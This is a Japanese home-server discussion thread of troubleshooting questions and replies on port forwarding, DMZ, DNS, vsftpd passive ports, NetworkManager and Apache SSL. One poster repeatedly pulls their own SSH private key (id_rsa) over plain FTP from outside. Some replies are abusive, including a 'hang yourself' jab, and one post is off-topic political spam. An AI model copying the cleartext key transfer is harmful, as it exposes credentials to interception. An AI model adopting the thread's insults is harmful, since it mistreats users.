うーん、一旦iptablesを無効にした状態（rooterのみでチェック）
で試してみます。

>>646
CentOS6です。結構便利なツールです。
画面からポート開放したい項目にチェックを入れて適用するだけで
iptablesに反映されます。

>>647
？？？どういう方法でそれって確認したらよいでしょうか？

ブラウザからポート指定でアクセスしてみぃや
それで出ないんなら相手側が閉じとぅ

>>648
そのツール使えよ、割合マジで。
netstatでどのポートで待ち受けてるかわかる。
ヘアピンじゃ無いんだよね？ケータイかなんかで確認しても無理か？
あと、素直にDHCPでIP取得して、ルータでMAC指定で固定アドレス振るようにした方がいいよ。

>>648
悪いことは言わんからおまえはまず↓へ行け

【ﾏｼﾞﾚｽ】超初心者の質問に答えるスレ1【ｴｽﾊﾟｰ】
http://engawa.2ch.net/test/read.cgi/linux/1325670768/

あぁん、せっかく弄り甲斐のある御間抜け閣下降臨だったのにぃ

>>647 >>649
ルータ側でポートフォワーディングの設定をした状態で
192.168.2.xxx　TCP+UDP　80 comment:web server
Windows（ブラウザ)からサーバ（CentOS6)に向けてアクセス
して確認したところ正常にApacheのページが見えました。

http://192.168.2.xxx:80/
↓　URLが変わりますが正常に表示されます。
http://192.168.2.xxx/

外からと中からが混乱するからプライベートアドレスに置換して説明するのはやめとけ

>>654
了解

うーん、ファイアウォールを無効にしてもポートが開かないなんて・・・

ポートは開いてるけど、ルータで弾いてるんじゃね？
ルータのログは見れないの？

鯖のアドレスが192.168.25.x/24なのにゲートウェイが192.168.1.x/24ってどういうこと？
ルーターのLAN側アドレスは？

そういえばルーターのメーカー型番は何？

ひでえｗ

結局
>>1 の内部からウンタラじゃないよな

米の日本軍慰安婦の碑撤去の署名【期日6/9】
http://ikura.2ch.net/test/read.cgi/ms/1338202472/307

署名お願いします。このままだと
「日本人が韓国人を拉致して性奴隷にしていた」＝真実になってしまいます。
必要なのはメールアドレスと名前だけで、
表示されるのはイニシャル名のみAkira.Sとかです。

>>656
ルータのログを見ましたがいまいちどれが原因となるログなのか今一わかりませんでした。。。

>>657
LAN-W30N/G8 ELECOM Logitec 8ポート無線LANルータ

鯖の内部アドレスは、
192.168.2.122

ルータのアドレスは、
192.168.2.1

に設定しています。

うぅーん、まいった。もう謝礼を払ってでもいいので開けたくなってきますた。

何をどう設定変更したのか、記録しているよね?
初心者ならやるべきことを書き出して、
それの変更の内容とかメモしておいても損はないと思うんだが。
まさかルータのDMZを有効にしていないとかないよな。

もうそろそろこのお間抜けさんは放置すべきだろ

折角だから業務用ルータでも導入だな

WAN側から鯖にパケットが届いてないことをどうやって確認しているか説明が必要だ。

ヘアピン理解してなかった閣下なのに、どうやって説明が可能なのかと。

>>662
＞まさかルータのDMZを有効にしていないとかないよな。
？？？
多分してないです。
それって　非武装地帯　の事ですよね？
ルータに必要なんですか？

>>664
高いだろ。

>>665
ポートが閉じている事しか確認してません。
その確認方法をご伝授ください。

>>666
ヘアピン？ぐぐってみるわ。

ヘアピンなんて無くったってPPPoEを通せるならルーター配下から別のプロバイダ経由でつなげば良いんだけどな

確認してみましたが
ＤＭＺは危険なので自宅サーバには向かないですね。

ネットワーク構築の絵が描けていないから設定に難儀することになる。
ここに貼り付くよりも本屋の方が適切じゃないのか。
宅鯖よりもVPSの方が最初はいいんじゃないかね。

踏み台作りに参加できると聞いて

危険だからDMZに置くんだろ･･･
もう何と言うかかんと言うか･･･

なんかもう釣りにしか見えないから俺は降りるぞｗ

|　大漁でしたね。　　　　　　 　　　　　　　　 ,
＼　　　　　　　　　　　　 　 　 　 　 　 　 ,／ヽ
　 ￣∨￣￣￣￣￣￣￣ 　 　 　 　 ,／　　　ヽ
　　 ∧＿∧　 　 　 　 　 ∧∧　　,／ 　 　 　 　 ヽ
　　（　´∀｀） 　 　 　 　 (ﾟДﾟ,,),／　　　 　 　 　 　 ヽ
　　（　　　　）　　　　　　(|　　つ@ ID:U9+fYXJ4　 　 ヽ
　　｜ ｜　| 　 ＿＿_ 〜|　　|　　　　　　　　　　　　　 　 ヽ
　　（_＿）＿）　|――|. 　∪∪　　　　 　 　 　 　 　 　 　 　 ヽ
　　￣￣￣￣￣￣￣￣￣￣￣￣|　　　　　　　　　　 　 　 　 ヽ
　　／⌒＼／⌒＼／⌒＼／⌒＼|彡~ﾟ　゜~ ~。゜　~ ~　~ ~~　~ ~~　~ ~~　~~　~~
　　⌒＼／⌒＼／⌒＼／⌒＼／⌒＼彡　〜　〜〜　〜〜　〜〜　〜　〜

ここ何てクソスレ？

DMZホストがキーワードだね。
この設定をやれば無事ポートが解放されそう。
↓こーいう図解を交えたサイトはベストですね。


http://lan-pc.pc-beginner.net/bb_router/bb_router_dmz.html

>>676
そんなのルータのマニュアルに載ってるんじゃないかね。
ほんとの問題点は、質問者が鯖の置かれる網の構成をまるで理解していないまま
施工していたことなんだが。

>>677
まぁーこまけーことは良いんじゃないかな？誰だって最初はとーしろうだったわけだしさ。

だからそう言う奴こそググれと言ったんだが

どっかのサイトで拾ってきた設定を元に質問するのは構わないが
自分の環境に合わせて変更した内容書いてくれないと
ちぐはぐな設定をしてミスってるのかも判断付かないんだよ

そもそもWAN側からのアクセスは何で検証してるんだよ
スマホか何かか？

>>678
素人や初心者という言葉は免罪符にならない。
分かってないなら情報を掲示しないと話にならん。

つーか、素人なら必要最低限の知っておくべき事が載ってる入門書買うべきでしょ。
RH系ならFedoraのノウハウ知ってるだけで大体事足りるんだし。
最も、基礎的な部分でこけてるから十年位前の本でも事足りそうだがな。

>>681
入門書をじゃーくれよ。
もしくはスキャンしてサイトにアップしろ。
金をかけずにスキルアップしてーんだよ。こちとらよ。

誰だって最初は素人だった云々以前に、
コイツほどいろんな意味で酷い初心者は見たことがねえよ。

>>682
ばっかだなあお前
立ち読みすればただで知識が手にはいるじゃないかｗ
ばっかだなあｗｗｗ

>>682
結果的に回り道しまくることによる時間的損失は金に換えられんぞ？

図書館で十分

>>682
かまわんよ？
ただしスキャン代は経費抜きで30万からになるけど支払えよ。
慈善事業じゃねえんだ、いくら厚顔無恥なお前でもそれくらいは分かるだろ。

>>682
で、その結果は結局グダグダになっただけだったなｗ
残ったのは断片的な知識とまともに動かないサーバか

スルー力が足りないスレでつね

そろそろ「できました」と「もう来ません」宣言が欲しいところだな

出来ました。
お前ら役に立たないのでもう来ません。

コレ置いときますね

もう来ねえよ！ヽ(`Д´)ﾉｳﾜｧｧﾝ

物事の進め方さえ理解しないままに俺様流儀で突走った挙げ句にこのザマｧか。
圧倒的な無痴には丁寧に説明された書籍がいちばんの栄養源なのにな。自らその選択肢を断つとはサスガだ。
ググれば素人鯖管が書いた立上げ/運営記がいっぱい見つかるし、無料の参考書だと思うが、参照した気配がない。
事例ごとに設定が違うから参考にならないと思ったのかネェ。ほんとダメな奴だ

書いてあるとおりにやったのに動かないのは書いたやつが悪い

書いてあるとおりにやったのに動かないのは書いてあることが正しいと盲信する読者が底なしのアホ
メーカーマニュアルでさえエラッタが出るのに他人の書いた記事なんかそのまま鵜呑みにするなんてマジキチ

スルーカw

間違った情報をブログに自信満々に公開している奴が糞


ブログに乗せるならしっかりした情報をのこしやがれ。

はじめて来たけど、面白いスレですね。
ときどきROMさせていただきます

痛がられたい電波出してる人たちには、ROMだけじゃなく
適切な弄りが必要ですよ。ボッチにされるのが嫌いな人たちです

>>697
>ブログに乗せる
掲示板に書き込むならしっかりした日本語を残しやがれ

×　掲示板に書き込むならしっかりした日本語を残しやがれ
○　掲示板に書き込むのであれば、正しい日本語で記述しましょう

句点も忘れずにね。

>>702
句読点　ｗ

素人と言われて恥晒したのがそれほど悔しかったか

くやしいのうくやしいのうwww

その後、マスゴミに対して延々と愚痴る>697であった。
嘘を嘘と見抜けないお馬鹿さんには辛いねｗｗ

>>704

× くやしいのうくやしいのうwww

○ 悔しいですねぇｗｗｗ

漢字も書けないレベルなんですね＾＾；

>>706
それ、悔しさを炙る2ch流の定型句なんだけどな。

煽りとマジレスも区別付かない大人の人って・・・

むしろ粗探しして、そこしか見つけられなかったんじゃないかと思うと泣けるわｗ

そうか、恥晒し閣下と呼ばれたいのか。

a

ポート開放出来ずに困ってた人です！！

ついに！出来たぁあああああああああああ！！

このスレの皆さんありがとう！！

>>712
おめでとう。
よければ何が原因だったか書いてくれると、他の人の参考にもなって助かる。

多分、彼は二度と現れないと思うよ。

>>713
>>104　さんのおかげです。

因みに
私のブログにはその辺のインチキ情報公開サイトとは違ってしっかりメモを残しておきました＾＾；

やけにスレが伸びてると思ったら香ばしい方が来ていたのかｗ

良くわからんが、鯖屋って香ばしい方が結構多いのか？
教えていた方々は至って普通だけど。

香ばしい臭いは目立つからな

>>717
お前の体臭の方が目立つよw

はい

これまでは、お名前.comで取得したドメインを海外サーバに割り当てて
いたのですが、自宅サーバ（固定IP)に割り当てようと思い
お名前.comの管理画面より次の設定を行ったのですが
aguseというサイトでネームサーバを確認したところ
海外サーバで使用していた時のネームサーバのままです。

プライマリネームサーバ test1.hogehoge.com
セカンダリネームサーバ test2.hogehoge.com


【作成したホスト名】
test1.hogehoge.com 202.123.123.116
test1.hogehoge.com 202.123.123.116


DNSの割当てに
果たして本当に最大72時間も掛かるとの事があるのでしょうか？

普通にあるわけだが

７２時間は長すぎとちゃうか？

TTLの値はいくつにしてたとか何時間待ってるのかとか肝心なこと書いてないからアレだが
とりあえず72時間待てばいいだけの話なんじゃねーの？

>>720
お名前の管理画面のどのメニューで何したのかちゃんと書けよ。

まあ普通は86400くらいだよな。
お名前に72時間って書いてあるのかな？
気になるならdigとかnslookupとかでTTLチェックしてみればいいんじゃない。

>>724
海外サーバのDNSで設定していたホスト名を削除して

新しく自宅サーバの固定IPを指定したホスト名を登録しました。

>>726
「ネームサーバーの変更」で
(1)自宅鯖をNSとしてホスト登録した
(2)その登録したホスト名をプライマリとセカンダリに登録した
をやったってこと？ で、受付メールが来てから何時間経ってるの？

コンテンツNSに自宅鯖使うとか凄ぇなｗ
お名前ってレンタルDNSないんか

>>727
うまくいかなかったので今日やりなおして4時間程度ですね。


>>728
レンタルDNSはありますけど
レンタルDNSってどういう意味なんだぁ？

・・・・・・・とりあえずおとなしく24時間待っとけ

新規じゃなくて移転だろ？ 手順が間違ってるんだよ。
移転前の古い情報を消さずに残してるから、古い情報を持ってるキャッシュDNSが
古い情報を見に行って古い情報でキャッシュを更新する。以下繰り返し。

nsは権威鯖から拾うから手順自体は間違ってない。あとはTTL×3レベル伝播分待てばいいだけの話。
まぁ前のレコードを消しておくに越したことは無いが。

もっともそれ以前にコイツがマトモなns立てれてるかっつー問題があるけどな。

せめて1週間前からTTL短くしとけよ

マシンを起動すると折角IPアドレスの固定化をしたにも関わらず
IPの設定値が戻ってしまいます。

192.168.4.111 (設定ファイルに設定）
↓　しかし、再起動を掛けると自動で別な値に変わります。
192.168.4.1


そこで、下記コマンドを実行すると
/etc/rc.d/init.d/network restart

正常に
192.168.4.111 の設定ファイルに設定したIPに戻ります。
これって何でですかねぇ？まいかいコマンドを実行するのが面倒なんですけど
みなさんはシェルか何かでキックしてますか？

Linux板の該当ディストリスレ行って聞いてください

>>734
「IPアドレスの固定化」ってのが具体的にどういう作業だったのか、
OSとかディストリビューションとかバージョンとかと合わせて書かないと。

>>736
↓下記2ファイルに対する修正を行いました。
vi /etc/sysconfig/network-scripts/ifcfg-eth0
vi /etc/sysconfig/network

CentOS6

皆さんお疲れ様でした。

otu

ヘアピン恥さらし野郎は今何してるのかな。

>>737
NetworkManagerを削除しろ

>>741
NetworkManagerによってどういった問題が引き起こされている為に
>>737の問題となっているのでしょうか？

CentOSは知らんが再起動で戻るならクライアントマシン向けのネットワーク自動設定機能じゃね？

>>743
いまいち分からないですが
ＰＣ再起動時に手動で

service network restart かまして対応する事にします。

毎回手動で流すのが面倒ですが。
ネットワーク接続のアプレット　　？？？

これらとネットワーク系の設定ファイルが競合している事が原因の気もしますね。

bondingやっててNetworkManagerがデフォのFedoraにアップデートしたら
設定書いてるifcfg-eth(n)をごっそり消されて往生した記憶があるな

タブブラウザに食わせてたクッキーが
タブブラウザ自身のアップデートで消されて、あちこちの再認証ではまったことならある。
せめて、それくらいは配慮して欲しかったが。

>>742
NetworkManagerが有効になっていると/etc/init.d/networkが実行されない

>>744
何で自分で調べないの？
何でアドバイス貰っておいて無視するの？

>>747
知りませんでした。ありがとうございます。

>>748
無視したつもりはありません。
networkmanagerをアンインストールしてしまって
ネット等全て繋がらなくなってしまうのではないか？
と心配だった為です。

ふーん
じゃあもう来るな

↑
お断りします。

>>751
で、DNSはちゃんと変わったのか？

>>752
？？？
DNS　が変わったとは何のことについてでしょうか？

何か最近のディストリビューションは、
ユーザ管理とかいちいちコマンドを使わなくても
GUIでする為の機能が揃っていると思うんだけど
すごく便利ですねぇ。

皆さんは、GUI（アプレット）は使わないのかな？

鯖用でしか導入しないんでそもそもGUIを起動しないって人ばかりじゃないかなぁ

OpenSSHのインストールを下記サイトを参考に行っています。
http://centossrv.com/openssh.shtml

最終的に
[root@localhost ~]# rpmbuild -tb --clean openssh-6.0p1.tar.gz
とビルドしようとすると
警告: line 92: buildprereq is deprecated: BuildPreReq: glibc-devel, pam
configure: WARNING: you should use --build, --host, --target
configure: WARNING: unrecognized options: --with-rsh
configure: error: in `/root/rpmbuild/BUILD/openssh-6.0p1':
configure: error: no acceptable C compiler found in $PATH
See `config.log' for more details
エラー: /var/tmp/rpm-tmp.gzquQL の不正な終了ステータス (%build)
RPM ビルドエラー:
line 92: buildprereq is deprecated: BuildPreReq: glibc-devel, pam
/var/tmp/rpm-tmp.gzquQL の不正な終了ステータス (%build)

と意味不明なエラーが出てしまうんですけど何が問題なのでしょうか？

一応、↓より最新のsshのソースを落としてビルドを行おうとしています。
http://ftp.jaist.ac.jp/pub/OpenBSD/OpenSSH/portable/

configure: error: no acceptable C compiler found in $PATH
ってのは？

最新のsshじゃないといけない理由が説明できないようなら
素直に標準のパッケージ使っとけ。

テンプレの外部ピコーん内部ショボーンを解決するためにbindでDNSを動かしてみた。
が、ブラウザで見ようとすると上手くいかん。
内部のWebブラウザからhogehoge.com→hogehoge.com/cgi-bin/cgi?req=twzになってNotFound

内部のWebブラウザからhogehoge.com/index.html→hogehoge.com/index.htmlが正常に表示される
内部のWebブラウザからwww.hogehoge.com→hogehoge.com/index.htmlが正常に表示される
外部のWebブラウザからhogehoge.com→hogehoge.com/index.htmlが正常に表示される
あとSSHやFTPは内部、外部ともにhogehoge.comで問題なくいける

これはどのあたりが問題になっとるんかな？

ブラウザのキャッシュ

>>760
無事解決いたしました。本当にありがとうございました。
てっきりサーバーかルーターの問題だとばかり。

完全に初心者スレになってるな

くだらない質問スレだからいいんじゃね
サーバをGUIとか

新スレタイ
くだらない人たちが質問するスレ

屑がエラソーに

>>757
ちょっと私には難しいので>>758にアドバイスされた様に標準的な方法で
OpenSSHを入れる事にしました。

FTPサーバにWindowsから接続しサーバ上のファイルをダウロードしようと
しているのですが

150 Opening BINARY mode data connection for /home/hagechabin/.ssh/id_rsa
(17xx bytes).

のままで固まります。なんだろう？

getでダメだったので put を試して見たのですがだめでした。

ftp> put hagetya.txt
で実行したところサーバ側では、 hagetya.txt をダウンロードした形式
はあったのですが肝心のデータは取得できてませんでした。

FTPはどんなモードで?

>>769
もちろん bin と入力しバイナリモードです。

うぅーん、21番ポートは正常に開いているし、
DMZでサーバに飛ばしてるし、
VSFTPサーバは起動してるし、

なんでなんでしょうかね？
※因みに　get した直後には次の200うんたらというメッセージも表示されてます。
200 PORT command successful. Consider using PASV
150 Opening BINARY mode data connection for /home/hagechabin/.ssh/id_rsa
(17xx bytes).

えっ

ﾆﾔﾆﾔ

ftpは21だけ開けてもダメだよ。

>>771
ftpはアクティブモードなら20と21番。パッシブモードなら21番と規定のポート範囲を開ける必要がある。
PASVってのはパッシブモードだからデータ転送用のポートを接続しようとして固まった。

スレチだったらすまんが教えてくれ。
CentOS5.2をルーターのみで使う場合ってどれくらいのスペック要求される？
インスコした時の付属のpppoeで4セッションで4つのISPに繋いでルーティング、配下の
クライアントPC3台でクローラ稼動させて常時2500ほどのTCPコネクション張ってる。
CPUがQ6600、メモリ4G、回線はNTT西の光ネクスト・エクスプレス1GタイプでNICだけは
Intelの5000円程度のやつを2枚、ハブは安物だけど稼動2ヶ月目にしてまだ落ちた事ナス。
コマンド叩いてCPU、メモリなどの情報見ても殆ど消費されてないんで、オーバースペック
だと思うけど、具体的にどの程度まで下げていいんだろ？
オクで落とそうと思ってるけど、さすがにセレロン700M+メモリ256程度じゃヤヴァイですか？
クライアントの方が限界なのでこれ以上セッションが大きく増えることはなさげ。

ロースペックを追い求める趣味がないのであれば、
現行モデルで売ってる一番安いCPU + 2GB mem + Intel NIC
ぐらいを新品で買ったら?
そのオクのやつでもいけるような気はするが256MBにCentOS5は大きすぎるように思うし
それぐらいの要求性能だとNICも重要かと。

そだね。
Core系以降のデュアルコアCPUでクロックは1.6GHz以上、
メモリ2GB程度と、現状のインテルNICx2に、
USBメモリ(OS起動、ルーティング情報やip排除リストなど)、
他のUSBメモリ(ログ等)とかかな。余ってるSSDでもいいけど。
HDDは却って邪魔かも。

すみません、質問です。
最近VineLinux＋Apache2で公開鯖を立てたんですが、プロバイダに上り転送量(トラフィック)が
1日15GBの制約があるのですが、自動的に15GBをオーバーした際にページがリクエストされても
エラーページに誘導するような事はできないんでしょうか？
以前借りてたレン鯖会社ではトラフィックが規定の1.3倍くらいになったらWEBにアクセスしたら
503っぽいページが表示され、日付が変われば元に戻ってましたので、そうしたシステムにしたいんです。
また、FTPも問答無用でログインできなくなってましたので技術的にはどのようにすれば良いのか、お教え願えませんか？

>>777-778
素早いレスありがとう。
ロースペ追求趣味はないのだが、以前使ってたルーター(マイクロ技研のOPT-G5)では
セッション数上限までには十分余裕あるもののダウン頻発で手元にあったパーツを
かき集めてルーター化したけど、逆に安定しすぎで気になって調べた。現行モデルより
少し落ちるけどDellのSC440+IntelNICあたりで十分いけそうですね。778さんの言うとおり、
HDDは邪魔だからOS起動とか必要なconfはANS-9010というメモリストレージを繋いで
それに放り込んで使ってたが、安物SSDもあるからそれで行く事にするよ。
ありがとうね！

>>779
apache2 bwshare でぐぐってみて。

>>780
ダウン頻発かいな。
そのルータのケースを開けて、発熱しすぎている部品がないか調べてみたら?
いちばんありそうなのが、ACアダプタの不調かも。
フタ開けて、余ってるファンで風あてて安定するようなら冷却改造でなんとかなる。
これも挑戦する価値あると思う。なんてったってPCルータより電気食わないんだし。

>>780
ちょうどこんなん出たぞ。
http://internet.watch.impress.co.jp/docs/news/20120607_538398.html

>>780
ついさっきメルマガきた。オンボードでIntel NIC×2で9,980円だとｗ
http://nttxstore.jp/_II_HP13894432

おもいっきりすれ違いでごめんなさい。

209.54.52.86

のIPって plesk.com がサーバを管理してるのでしょうか？

すれち

>>785
というか板違い

せめて行き先くらい案内してやれよ
板違いとか言うだけなら俺だってできるんだぞ

じゃ任せた

しかし地獄行く

いきなり失礼。

クラッキング等の対策でよく「パッチを当てる」というのが挙げられるけど、
公開された脆弱性の情報を収集したり目を通すのが面倒くさいんだよね。
だからcronで毎日更新をかけているのだけど、どこかダメな点ある？

（ただし、バージョンアップによる不具合発生の可能性については目を瞑る）

そもそも脆弱性対応ってなるべくサービス断やVerUp後に想定外の事象が発生しないように
機器の使用環境で影響の無い脆弱性についてはスルーするかワークアラウンドで対応すると思うが、
その辺を放棄してる時点でもう他に気にすることはねぇよ！
ウンチ漏らしながら空から鳥の糞が落ちてこないか警戒してるようなもん。

>>791
何もしないよりはマシだし、自分がそれで困らなきゃ、いいんじゃないの。

ここ、自宅サーバ板だよな…。

> なるべくサービス断やVerUp後に想定外の事象が発生しないように

その自宅鯖が停止すると第三者に被害が出るのならばともかく、
そうでなければ>>791で別にいいんじゃないの？
業務や仕事でたてるサーバなく、あくまで自宅鯖での話でしょ？

ん？そう思うよ。

>>794
>>791はまんま同じ事言うてるよｗ

鯖の場所とか関係無い話でそ

あ、悪い、>>792だった

こまけーことはえーだろうが。

>>774 >>775
20番、21番、1500〜1505番ポートの開放設定をした上で
試してみましたがやはり固まります。
※固まっている最中に 1500番〜1505番のポート開放状態を確認したところ閉じていました。
しっかり、 /etc/ftpaccess でFTP実行時のポート番号の指定はしました。
どうしてもPassiveモードで出来ない場合、Activeモードの使用も考えているのですが
後者を使用するのはFTPサーバの王道から外れたりするものなのでしょうか？

[root@localhost ~]# vi /etc/ftpaccess
passive ports 0.0.0.0/0 1500 1505

[root@localhost ~]# vi /etc/sysconfig/iptables
-A INPUT -m state --state NEW -m udp -p udp --dport 20 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 21 -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 1500:1505 -j ACCEPT

router
192.168.2.200 TCP+UDP 1500-1505

>>625

Apatche + mod_sslでwebページパスワード制限を設定中ですができません・・・
IE8で証明書の警告画面で閲覧続行選ぶと 500 INTERNAL SERVER ERRORが返ってきてしまう

CentOS6.2で[CentOSで自宅サーバ構築]というサイト見ながらまったく同じようにやってます
.htacesssがおかしんですかねー？

なぜエラーログを見ない（児玉清風

みっ見方がわからなかったんです///

[Sun Jun 10 15:05:31 2012] [error] [client ＊] Directory index forbidden by Options directive: /var/www/html/
[Sun Jun 10 15:06:25 2012] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)
[Sun Jun 10 15:06:25 2012] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)
[Sun Jun 10 15:06:29 2012] [error] [client ＊] Directory index forbidden by Options directive: /var/www/html/
[Sun Jun 10 15:06:33 2012] [error] [client ＊] Directory index forbidden by Options directive: /var/www/html/
[Sun Jun 10 15:06:35 2012] [error] [client ＊] Directory index forbidden by Options directive: /var/www/html/
[Sun Jun 10 15:06:53 2012] [alert] [client ＊] /var/www/html/secret/.htaccess: Invalid command 'SLRequireSSL', perhaps misspelled or defined by a module not included in the server configuration
[Sun Jun 10 15:07:01 2012] [alert] [client ＊] /var/www/html/secret/.htaccess: Invalid command 'SLRequireSSL', perhaps misspelled or defined by a module not included in the server configuration
[Sun Jun 10 15:07:04 2012] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)
[Sun Jun 10 15:07:04 2012] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)

あんまりじろじろ見ないでくださいね///

やん！
スペルミスだったわ///

>>804
じろじろ

君たちが専用サーバを使わずに
自宅サーバ使ってる理由って何？

やっぱり金？

君たち()笑

このスレだけで数回語られたネタのような。

構ってレス乞食に餌やるなよ
粘着されるぞ

やっぱりFTPを動作せる事ができません。
再度、FTP接続し（外部回線）よりFTPコマンドでFTPサーバに接続し、FTPサーバ上のデータを取得しようと
試みているのですが、固まります。

★FTP実行時に使用するポート番号を定義（PASSIVEモード）
vi /etc/vsftpd/vsftpd.conf
pasv_min_port=60000
pasv_max_port=60030

★iptables
-A INPUT -m state --state NEW -m tcp -p tcp --dport 60000:60030 -j ACCEPT

★クライアントよりログイン
C:\Users\hogeman>ftp 222.222.222.222
222.222.222.222 に接続しました。
220 Welcome to HOGE_FTP service.
ユーザー (222.222.222.222:(none)): hageuser
331 Please specify the password.
パスワード:
230 Login successful.
ftp> bin
200 Switching to Binary mode.
ftp> pwd
257 "/home/hageuser"

ここまでOK。

データを取得しようとすると↓の状態で固まります。。。
（以前にFTPサーバを作成した時は結構あっさり出来たんだけどなぁー）

ftp> get /home/hageuser/.ssh/id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for /home/hageuser/.ssh/id_rsa (1743 bytes).

ftpdのパッシブモードで返答する接続先ポートのアドレスを指定するオプションでルーターのグローバルアドレスを指定
それで駄目ならパケットキャプチャで全部見る

ftpの便乗質問済まんが教えてくれ、Cent5.5付属のvsftpdってクライアントのXPの
プロンプトからput、getすれば激速だがFFFTPだと極端に速度落ちるのは仕様？
ちなみにconfはほとんど何も弄ってない。
環境は全てギガビットで前者は8〜900mbpsのほぼMAX出るけどFFFTPだと150mbpsがいいところ・・。

今更FFFTPかよ。
それに限らず、レジストリにIDやパスワードを平文で書いちまうソフトなんか使うべきじゃない

>>815
最新バージョンは暗号化してるはずだけど？

win SCP 使え
ばかども

と筆頭ヴァカが申しております

>>812
PASVコマンドまではOKだからやっぱデータコネクションが通ってないんじゃないかな。
パッシブモードなんで当然データコネクションはクライアント側から始まるわけで、
サーバ側とNAT機器でちゃんとパッシブのデータコネクション用ポートが開いてNATされてんのか再確認したほうがいい。
高価なFWなら通信内容から判断して動的に開放してくれる場合もあるけど、安物の機器なら自分で開けないとだめかも。
あと、あんま見たこと無いけどPASVコマンドのレスポンスにあるサーバのIP、ポートを
グローバルに変換してくれない機器もあるらしいからその辺も視野に入れてみては。

横から失礼します
自宅鯖でブログとか掲示板やってたりする場合、外部から触法行為があったりしたら
管理者は逮捕されるんですか？
例えば掲示板に悪意を持って信用毀損と名誉毀損のような内容を書き込まれた場合、
または児童ポルノ画像とか投稿された場合など。
プロバイダ責任法というのを見たら被害者とか機関から開示請求や削除要請に応じたら
責任は免除される、と理解していますが。
それとも管理者はプロバイダではないからいきなり逮捕とか慰謝料って事も？？

>>811
あてずっぽうですが、conntrack_ftp関係の設定が抜けてるんじゃないかな。

>>820
プロバイダ責任法では営利目的かどうかに関わらず個人であっても不特定の人に
対してサーバを公開していたら「特定電気通信役務提供者」に当たるよ
だから自宅鯖でも他者の権利を侵害している書き込みの送信防止義務や発信者情報開示義務がある
児童ポルノ等、刑事上違法な投稿の刑事責任はプロバイダ責任法では免責されない

追加で↓の設定も行いました。
vi /etc/ftpaccess
passive ports 0.0.0.0/0 60000 60030

>>813
＞ftpdのパッシブモードで返答する接続先ポートのアドレスを指定するオプションで
因みにですが、これはクライアント(Windows 7)のコマンドプロンプトより
ftp 222.222.222 と接続する際に
ftp 222.222.222　-[option]といった具合に指定するのでしょうか？

皆さんは、CentOS6 でFTP設定を行う場合に
スムーズにvsftpdの設定は行きましたか？

FTPサーバの構築でこんなにはまるとは思ってもいませんでした。

>>823
まずサーバーのパケットフィルタを切れ。
TLS/SSL接続固定ならルーターの制御コマンド・レスポンスに対するアドレス変換が使えないから
サーバーのvsftpd.confにpasv_addressを追加。

マイクロリサーチのSuperOpt90の最大同時セッション数って分かりませんか？
ぐぐったのですが物が古いためか情報が見つかりません。

ググって最初に出てくるマニュアルにちゃんと書いてあるわけだが。

こちらで質問していいのか迷いましたが、
Linuxで大量の画像ファイルを扱う案件を任されました。

最終的には400万ファイル（一つ10kb程度）ぐらいになりそうです。
そこで質問なんですが、linuxではそういった大量の画像を
一つのディレクトリに保存してもパフォーマンス的には大丈夫なのでしょうか？

もし分けるとしたら1ディレクトリに保存するファイル数はいくつぐらいが望ましいとかってありますか？

あ、書き忘れました。
Web案件でPHPとMYSQLでファイルを呼び出して使います。

>>827
ファイルシステムの問題だからext3とかext4とかでググれ
それでもわからんのならLinux板いってこい

>>823
パッシブが必須じゃないならアクティブ使えば？

>>830
どうしたらモードを切り替えられますか？

vsftpd モードってやっても具体的な
設定方法を解説しているページが見つかりません。

>>829
なるほど、ファイルシステムがそもそも違うんですね。
ググったら同じ疑問を持っている人がたくさんいますねｗ
勉強してみます。
どもでした。

>>831
pasv_enable

>>831
「vsftpd active mode」でググるだけでアッサリでてくるわけだが
お前の言う「具体的」ってのはどこまでの話なんだ？
conf内容コピペで全部済むレベル？

素朴な質問なんですけど、↓のＷＥＢサーバをレンタルしようと思ってますが
電話をしてもいつも繋がりません。
まっとうなＷＥＢサーバ貸与業者なのでしょうか？

www.nativehosting.com

板名100回読んでLANケーブルで首吊って氏ね

Linuxの入ったハードディスクをＡのマシンからＢのマシンに乗せ換えたい場合
そのままハードディスクをつなぎ直せば動きますか？
マザーボードやＣＰＵが違うのですが、windowsみたいにpulug&playで
自動で設定されますか？

>>837
あらかた動くと思うけど、ちゃんと要るファイルだけ抜いて新しくインストールして移行した方がいいと思うよ。
Debian ならインスコ中パッケージの一覧をdpkg -lで見れるから、移行してからaptitudeでガサッと入れるだけだし。

>>837
ものすごく古いディストリビューションだとか、
新しいマシンがよほど特殊な構成だとか、
古いマシンの構成に超依存したハードウェア設定をしているとか、
新旧マシンの世代隔差が半端ないとか、
でない限り問題ないです。

常時簡単な占いサイトを提供するサーバあるとして
これ、メンテ考えた時
交換用サーバを同じIPで繋げて、ゲームが出来るのを確認したら、
最初に提供したサーバの電源落としたとする。

この時、最初のサーバでゲームやってたやつって
プッツリ消えるの？
こうならない方法ってある？

その文章の何処に自宅鯖があるのか、
というかもろ板違いなんだよなぁ…（困惑）

自宅鯖で仮の話なのに（困惑）